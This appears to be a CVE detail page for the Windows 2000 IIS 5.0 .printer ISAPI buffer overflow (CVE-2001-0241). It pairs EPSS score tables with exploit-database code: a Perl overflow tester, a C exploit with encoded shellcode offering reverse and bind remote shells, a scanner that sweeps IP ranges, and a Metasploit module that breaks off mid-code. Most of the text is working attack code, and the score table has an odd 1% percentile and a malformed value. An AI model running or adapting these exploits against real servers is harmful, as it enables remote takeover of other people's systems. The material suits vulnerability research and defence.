CVE-2001-0241 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	61.45%	–	–
2023-03-12	–	–	–	95.37%	–
2023-08-20	–	–	–	95.53%	–
2024-02-25	–	–	–	95.42%	–
2024-06-02	–	–	–	95.42%	–
2024-12-22	–	–	–	94.71%	–
2025-01-19	–	–	–	94.71%	–
2025-03-18	–	–	–	–	89.92%
2025-04-10	–	–	–	–	88.82%
2025-04-10	–	–	–	–	88.82,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	99%
2023-08-20	99%
2024-02-25	99%
2024-06-02	99%
2024-12-22	99%
2025-01-19	99%
2025-03-18	1%
2025-04-10	99%
2025-04-10	99%

#source: https://www.securityfocus.com/bid/2674/info #Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack. #* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings. #!/usr/bin/perl # Exploit By storm@stormdev.net # Tested with sucess against Win2k IIS 5.0 + SP1 # Remote Buffer Overflow Test for Internet Printing Protocol # This code was written after eEye brought this issue in BugTraq. use Socket; print "-- IPP - IIS 5.0 Vulnerability Test By Storm --\n\n"; if (not $ARGV[0]) { print qq~ Usage: webexplt.pl <host> ~; exit;} $ip=$ARGV[0]; print "Sending Exploit Code to host: " . $ip . "\n\n"; my @results=sendexplt("GET /NULL.printer HTTP/1.0\n" . "Host: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n"); print "Results:\n"; if (not @results) { print "The Machine tested has the IPP Vulnerability!"; } print @results; sub sendexplt { my ($pstr)=@_; $target= inet_aton($ip) || die("inet_aton problems"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ select(S); $|=1; print $pstr; my @in=<S>; select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } }

/* source: https://www.securityfocus.com/bid/2674/info Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack. * If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings. */ //---------------------------sol2k.c-------------------------------- #ifdef _WIN32 #include <Winsock2.h> #include <Windows.h> #include <stdlib.h> #include <string.h> #define snprintf _snprintf #else #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #endif #include <stdio.h> #include <string.h> #include <fcntl.h> unsigned long *ret[20]; unsigned char send_buf[2000]; unsigned char request[]= "\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20" "\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a"; unsigned char revers_shell[]= "\x42\x65\x61\x76\x75\x68\x3a\x20\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90" "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95" "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95" "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3" "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa" "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91" "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6" "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56" "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55" "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95" "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95" "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5" "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18" "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a" "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14" "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2" "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14" "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2" "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd" "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5" "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d" "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3" "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3" "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15" "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a" "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0" "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd" "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1" "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e" "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4" "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6" "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7" "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6" "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0" "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1" "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2" "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95" "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95" "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6" "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0" "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb" "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb" "\xf0\xed\xf0\x95\x0d\x0a"; //FlashSky/Benjurry and, H D Moore's code unsigned char shell[]= "\x42\x65\x61\x76\x75\x68\x3a\x20\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff" "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2" "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80" "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09" "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6" "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf" "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad" "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81" "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81" "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80" "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80" "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80" "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80" "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80" "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81" "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6" "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3" "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50" "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4" "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4" "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4" "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f" "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b" "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80" "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89" "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80" "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83" "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83" "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78" "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c" "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b" "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04\x0d\x0a"; unsigned char overflow[]= "\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33" "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0" "\xeb\xb9\x90\x90\x41\x41\x41\x41\x0d\x0a\x0d\x0a"; unsigned short lportl=666; /* drg */ char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */ int z=0; int s; unsigned short int a_port; unsigned long a_host; struct hostent *ht; struct sockaddr_in sin; #ifdef _WIN32 WORD werd; WSADATA wsd; #endif int main(int argc, char *argv[]){ //call ebx values in msw3prt.dll ret[0] = 0x6A8C3105; ret[1] = 0x6A8C317F; ret[2] = 0x6A8C3267; ret[3] = 0x6A8C32AD; ret[4] = 0x6A8C3DB9; ret[5] = 0x6A8C3DC2; ret[6] = 0x6A8C3E23; ret[7] = 0x6A8C4D88; ret[8] = 0x6A8C4DD1; ret[9] = 0x6A8C4DFB; ret[10] = 0x6A8C5383; ret[11] = 0x6A8C5395; ret[12] = 0x6A8C565D; ret[13] = 0x6A8C6437; ret[14] = 0x6A8C6451; ret[15] = 0x6A8C66C2; ret[16] = 0x6A8C66FB; ret[17] = 0x6A8C6B04; ret[18] = 0x6A8C6B1D; ret[19] = 0x6A8C73A4; ret[20] = 0x6A8C73D8; ret[21] = 0x6A8C73F4; ret[22] = 0x6A8C9C55; ret[23] = 0x6A8C9C86; ret[24] = 0x6A8CCF13; ret[25] = 0x6A8CCF4B; ret[26] = 0x6A8CCF62; #ifdef _WIN32 werd= MAKEWORD(2,0); WSAStartup(werd,&wsd); #endif printf("iis5 remote .printer overflow.\n" "dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n" "Updated by sectroyer the member of Random Intruders\n"); if (argc < 3){ printf("usage: %s 0 <vicHost> <vicPort> <atckHost> <atckPort> [<ret 1-26>]\nOr: %s 1 <vicHost> [<shellPort>] [<vicPort>] [<ret 1-26>]\n",argv[0],argv[0]); exit(1); } if (argc >= 3){ if(!atoi(argv[1]) && argc < 6) { printf("usage: %s 0 <vicHost> <vicPort> <atckHost> <atckPort> [<ret 1-26>]\nOr: %s 1 <vicHost> [<shellPort>] [<vicPort>] [<ret 1-26>]\n",argv[0],argv[0]); exit(1); } else if(atoi(argv[1])==1 && argc<3) { printf("usage: %s 0 <vicHost> <vicPort> <atckHost> <atckPort> [<ret 1-26>]\nOr: %s 1 <vicHost> [<shellPort>] [<vicPort>] [<ret 1-26>]\n",argv[0],argv[0]); exit(1); } } if(!atoi(argv[1])) { if(argc>6 && atoi(argv[6])<27 && atoi(argv[6])>-1) *(unsigned long *)&overflow[358]=ret[atoi(argv[6])]; else *(unsigned long *)&overflow[358]=ret[0]; memcpy(&send_buf,&request,strlen(request)); memcpy(&send_buf[strlen(request)],&revers_shell,strlen(revers_shell)); memcpy(&send_buf[strlen(request)+strlen(revers_shell)],&overflow,strlen(overflow)); printf("You need to you need to set up a netcat listener on the host you control.\nEx: nc -l -p %s -vv\n",argv[5]); if ((ht = gethostbyname(argv[2])) == 0){ printf("%s",argv[2]); exit(1); } sin.sin_port = htons(atoi(argv[3])); a_port = htons(atoi(argv[5])); a_port^=0x9595; sin.sin_family = AF_INET; sin.sin_addr = *((struct in_addr *)ht->h_addr); if ((ht = gethostbyname(argv[4])) == 0){ printf("%s",argv[4]); exit(1); } a_host = *((unsigned long *)ht->h_addr); a_host^=0x95959595; send_buf[441]= (a_port) & 0xff; send_buf[442]= (a_port >> 8) & 0xff; send_buf[446]= (a_host) & 0xff; send_buf[447]= (a_host >> 8) & 0xff; send_buf[448]= (a_host >> 16) & 0xff; send_buf[449]= (a_host >> 24) & 0xff; } else if(atoi(argv[1])==1) { if(argc>3) printf("Use Netcat to connect to %s:%s\n", argv[2],argv[3]); else printf("Use Netcat to connect to %s:4444\n", argv[2]); if(argc>5 && atoi(argv[5])<27 && atoi(argv[5])>-1) *(unsigned long *)&overflow[358]=ret[atoi(argv[5])]; else *(unsigned long *)&overflow[358]=ret[0]; if(argc>3 && atoi(argv[3])>0) { lportl=atoi(argv[3]); lportl=htons(lportl); memcpy(&lport[1], &lportl, 2); *(long*)lport = *(long*)lport ^ 0x9432BF80; memcpy(&shell[279],&lport,4); } memcpy(&send_buf,&request,strlen(request)); memcpy(&send_buf[strlen(request)],&shell,strlen(shell)); memcpy(&send_buf[strlen(request)+strlen(shell)],&overflow,strlen(overflow)); if ((ht = gethostbyname(argv[2])) == 0){ printf("%s",argv[2]); exit(1); } if(argc>4 && atoi(argv[4])>0) { sin.sin_port = htons(atoi(argv[4])); } else sin.sin_port = htons(80); sin.sin_family = AF_INET; sin.sin_addr = *((struct in_addr *)ht->h_addr); } if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){ perror("socket"); exit(1); } printf("\nconnecting... \n"); if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){ perror("connect"); exit(1); } send(s, send_buf, strlen(send_buf),0); sleep (1); #ifdef _WIN32 closesocket(s); #else close(s); #endif if(!z) printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n"); else printf("sent...\n"); exit(0); }

/* source: https://www.securityfocus.com/bid/2674/info Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack. * If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings. */ /* Author: styx^ source: Iis Isapi Vulnerabilities Checker v 1.0 License: GPL This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. Email: Write me for any problem or suggestion at: the.styx@gmail.com Date: 02/02/2005 Read me: Just compile it with: Compile: gcc iivc.c -o iivc Use: ./iivc <initial_ip> <final_ip> [facultative(log_file)] Example: ./iivc 127.0.0.1 127.0.0.4 scan.log PAY ATTENTION: This source is coded for only personal use on your own iis servers. Don't hack around. Special thanks very much: To overIP (he's my master :) To hacklab crew (www.hacklab.tk) Bug: This checker scans a range of ip and checks the iis 5.0/1 sp1/2 .printer ISAPI extension buffer overflow vulnerability. If we send to a server about 420 bytes,we can do a buffer overflow.Find for more specifications of this vulnerability in www.securityfocus.com or bugtraq. Enjoy your self! :) (I've been ispired (but just this :) from perl storm@stormdev.net's checker). */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/ioctl.h> #include <fcntl.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> #include <string.h> #include <signal.h> #include <time.h> #define PORTA 80 int i = 0, j = 0, k = 0, l = 0; int a = 0, b = 0, c = 0, d = 0; int z = 0; FILE *f; int result(int ); void scan(char *); void separe(char *, char *); void write_file(char *); void author(); int main(int argn, char *argv[]) { char initip[16], finip[16]; struct tm *t; char *sep = "+-------------------------------------------------------+\n\n\n"; time_t s, iniz, fini; memset(initip, 0x0, 16); memset(finip, 0x0, 16); if ( argn < 4 ) { author(); printf("\n\nUse: %s <initial_ip> <final_ip> <log_file>\n", argv[0]); printf("\nExample.\n%s 127.0.0.1 127.0.0.4 scan.log\n\n\n", argv[0]); exit(0); } time(&iniz); if((f = fopen(argv[3], "a")) == NULL) { printf("Error occured when I try to open file %s\n", argv[3]); } z++; printf("\nNow the checker will write the result of scan in %s in your local directory..\n\n", argv[3]); write_file("+-------------------------------------------------------+\n| "); s = time(NULL); write_file(asctime(localtime(&s))); write_file("+-------------------------------------------------------+\n|\n"); sleep(1); author(); sleep(2); separe(argv[1],argv[2]); sprintf(finip,"%d.%d.%d.%d",a,b,c,d); while(1) { sprintf(initip, "%d.%d.%d.%d", i, j, k, l); printf("\n\n\nI'm connecting to: %s\n", initip); scan(initip); if ( strcmp(initip, finip) == 0) { write_file("|"); break; } l++; if ( l == 256) { l = 0; k++; if ( k == 256) { k = 0; j++; if (j == 256) { j = 0; i++; } } } } time(&fini); printf("\n*************************\n"); printf("\nSCAN FINISHED! in %d sec\n\n", fini - iniz); if( z > 0 ) { printf("You can view the file %s to see quietly scan's results..\n\n", argv[3]); fprintf(f, "\n%s\n", sep); } return 0; fclose(f); } void separe(char *ip,char *ip2) { char *t = '\0'; int f = 0; t = strtok(ip,"."); i = atoi(t); while( t != NULL) { t = strtok(NULL, "."); f++; if ( f == 1) j = atoi(t); else if (f == 2) k = atoi(t); else if (f == 3) l = atoi(t); } t = '\0'; f = 0; t = strtok(ip2,"."); a = atoi(t); while( t != NULL) { t = strtok(NULL, "."); f++; if ( f == 1) b = atoi(t); else if (f == 2) c = atoi(t); else if (f == 3) d = atoi(t); } return; } void scan(char *ip) { int sock, risp; struct sockaddr_in web; char buf[50]; int i = 0; if( (sock = socket(AF_INET,SOCK_STREAM,0)) < 0 ) { printf("Error occured when I try to create socket\n"); perror("sock:"); } web.sin_family = AF_INET; web.sin_port = htons(PORTA); web.sin_addr.s_addr = inet_addr(ip); if( connect(sock, (struct sockaddr *)&web, sizeof(web)) < 0 ) { printf("I can't connect to %s..is it online?\n", ip); perror("connect: "); } printf("Ok..I'm sending the string..."); risp = result(sock); if( risp == 0 ) { printf("The server %s is vulnerable...i think that you have to install a patch! :)\n\n", ip); if ( z > 0 ) { sprintf(buf, "| The server %s is vulnerable.!\n", ip); write_file(buf); for( i = 0; i < 50; i++ ) { buf[i] = '\0'; } } } else { printf("I'm sorry: the server %s is not vulnerable..change target\n", ip); if ( z > 0 ) { sprintf(buf, "| I'm sorry:the server %s is not vulnerable.\n", ip); write_file(buf); for( i = 0; i < 50; i++ ) { buf[i] = '\0'; } } } sleep(1); close(sock); return; } int result(int sock) { char *expl = "GET /NULL.printer HTTP/1.0\nHost: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n"; char buf[1024]; int i = 0; for ( i = 0; i< 1024; i++) { buf[i] = '\0'; } if( write(sock, expl, strlen(expl)) == -1) { printf("Error occured when I try to send exploit...\n"); perror("write: "); } if( read(sock, buf, sizeof(buf)) == -1) { printf("Error occured when I try to read from sock...\n"); perror("read: "); } if( buf == NULL) { return 0; } else { return -1; } } void write_file(char *buf) { fprintf(f, "%s", buf); return; } void author() { printf("\n\n\n"); printf("+--------------------------------------------+\n"); printf("| |\n"); printf("| styx^ checker for |\n"); printf("| IIS 5.0 sp1 sp2 ISAPI Buffer Overflows |\n"); printf("| |\n"); printf("+--------------------------------------------+\n\n"); }

source: https://www.securityfocus.com/bid/2674/info Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack. * If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20818.zip

## # $Id: ms01_023_printer.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft IIS 5.0 Printer Host Header Overflow', 'Description' => %q{ This exploits a buffer overflow in the request processor of the Internet Printing Protocol ISAPI module in IIS. This module works against Windows 2000 service pack 0 and 1. If the service stops responding after a successful compromise, run the exploit a couple more times to completely kill the hung process. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9179 $', 'References' => [ [ 'CVE', '2001-0241'], [ 'OSVDB', '3323'], [ 'BID', '2674'], [ 'MSB', 'MS01-023'], [ 'URL', 'http://seclists.org/lists/bugtraq/2001/May/0005.html'], ], 'Privileged' => false, 'Payload' => { 'Space' => 900, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'StackAdjustment' => -3500, }, 'Targets' => [ [ 'Windows 2000 English SP0-SP1', { 'Platform' => 'win', 'Ret' => 0x732c45f3, }, ], ], 'Platform' => 'win', 'DisclosureDate' => 'May 1 2001', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80) ], self.class) end def check connect sock.put("GET /NULL.printer HTTP/1.0\r\n\r\n") resp = sock.get_once disconnect if !(resp and resp =~ /Error in web printer/) return 